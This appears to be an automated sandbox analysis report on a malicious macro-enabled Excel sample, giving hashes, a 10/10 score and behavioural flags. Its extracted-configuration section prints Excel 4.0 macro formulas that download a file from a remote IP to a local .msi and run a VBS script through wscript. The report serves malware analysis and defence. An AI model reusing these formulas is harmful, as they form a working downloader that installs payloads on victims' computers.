General
-
Target
b10e20019338f116e68cc34f9932e12f
-
Size
6KB
-
Sample
231222-q7mjwadceq
-
MD5
b10e20019338f116e68cc34f9932e12f
-
SHA1
6514c0b127c01c02f471f643772bed51abda6d39
-
SHA256
4dc2e1cbc8fb771ed10c4e9957437c6e3962de1223e700275a53f41adb036763
-
SHA512
cb8daa79b2435445cefa14ee0700b065fde39f23fa80d4879afd09afc1b703f962e1709ce89530af179f8270038547c2526cd4d486e9969929130a7a97a29020
-
SSDEEP
192:NDSauSYbrA2OmmfRf8UhHFBFYuRb98y254W+s:N5uZM2wV1FYgb98y254g
Static task
static1
Behavioral task
behavioral1
Sample
b10e20019338f116e68cc34f9932e12f.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
b10e20019338f116e68cc34f9932e12f.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0)
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0)
=EXEC("wscript C:\zer\spp.vbs")
=HALT()
Targets
-
-
Target
b10e20019338f116e68cc34f9932e12f
-
Score
10/10
-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-